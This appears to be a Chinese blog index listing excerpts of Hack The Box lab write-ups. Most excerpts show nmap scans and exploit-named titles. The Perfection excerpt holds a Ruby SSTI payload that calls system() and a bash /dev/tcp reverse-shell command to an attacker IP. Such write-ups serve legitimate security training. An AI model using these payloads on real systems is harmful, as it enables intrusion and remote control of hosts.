meachines专题

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自动化权限提升+openssl 权限提升

信息收集 IP AddressOpening Ports10.10.10.119TCP:22,80,389 $ nmap -p- 10.10.10.119 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4 (protocol 2.0)| ssh-hostkey:|

[Meachines] [Medium] Bitlab 标签自动填充登录+GitLab+Docker横向+Postgresql+逆向工程

信息收集 IP AddressOpening Ports10.10.10.114TCP:22,80 $ nmap -p- 10.10.10.114 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; pr

[Meachines] [Easy] Safe BOF+ROP链+.data节区注入BOF+函数跳转BOF+KeePass密码管理器密码破译

信息收集 IP AddressOpening Ports10.10.10.147TCP:22，80，1337 $ nmap -p- 10.10.10.147 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol

[Meachines] [Insane] Bankrobber XSS-MDOG+SQLI+XSRF+Local-RCE+Bankv2转账模拟应用缓冲区溢出

信息收集 IP AddressOpening Ports10.10.10.154TCP:80，443，445，3306 $ nmap -p- 10.10.10.154 --min-rate 1000 -sC -sV -Pn PORT STATE SERVICE VERSION 80

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Webshell上传+Linux子系统命令历史记录泄露权限提升

信息收集 IP AddressOpening Ports10.10.10.97TCP:80，445，8808 $ nmap -p- 10.10.10.97 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 10.0| http

[Meachines] [Medium] Bastard Drupal 7 Module Services-RCE+MS15-051权限提升

信息收集 IP AddressOpening Ports10.10.10.9TCP:80,135,49154 $ nmap -p- 10.10.10.9 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 7.5| http-methods:

[Meachines] [Easy] Optimum HFS文件管理2.3.x-RCE+MS16-032

信息收集 IP AddressOpening Ports10.10.10.8TCP:80 $ nmap -p- 10.10.10.8 --min-rate 1000 -sC -sV -Pn PORT STATE SERVICE VERSION80/tcp open http HttpFileServer httpd 2.3|_http-server-header: HFS 2

[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程迁移+MS15-051权限提升

信息收集 IP AddressOpening Ports10.10.10.15TCP:80 $ nmap -p- 10.10.10.15 --min-rate 1000 -sC -sV -Pn PORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 6.0|_http-server-header: Micr

[Meachines] [Easy] Legacy nmap 漏洞扫描脚本深度发现+MS08-067

信息收集 IP AddressOpening Ports10.10.10.4TCP:135,139,445 $ nmap -p- 10.10.10.4 --min-rate 1000 -sC -sV -Pn PORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC

[Meachines][Medium]IClean

Main $ nmap -p- -sC -sV 10.10.11.12 -Pn --min-rate 1000 $ echo "10.10.11.12 capiclean.htb">>/etc/hosts 这题可能和python的SSTI有关 $ gobuster dir --url "http://capiclean.htb" --wordlist /usr/share/s

[Meachines][Easy]Perfection

Main $ nmap -sV -sC 10.10.11.253 --min-rate 1000 使用Ruby开发的,尝试Ruby的SSTI注入 x%0a<%25%3Dsystem("ping+-c1+10.10.16.23");%25> $ echo "/bim/bash -i >& /dev/tcp/10.10.16.23/10032 0>&1"|base64 categ

[Meachines][Easy]Headless

Tools https://github.com/MartinxMax/MDOG 针对XXS攻击 Main $ nmap -sC -sV 10.10.11.8 --min-rate 1000 类似于留言板通过目录扫描,发现一个仪表盘 $ gobuster dir -u "http://10.10.11.8:5000" -w /usr/share/wordlists/di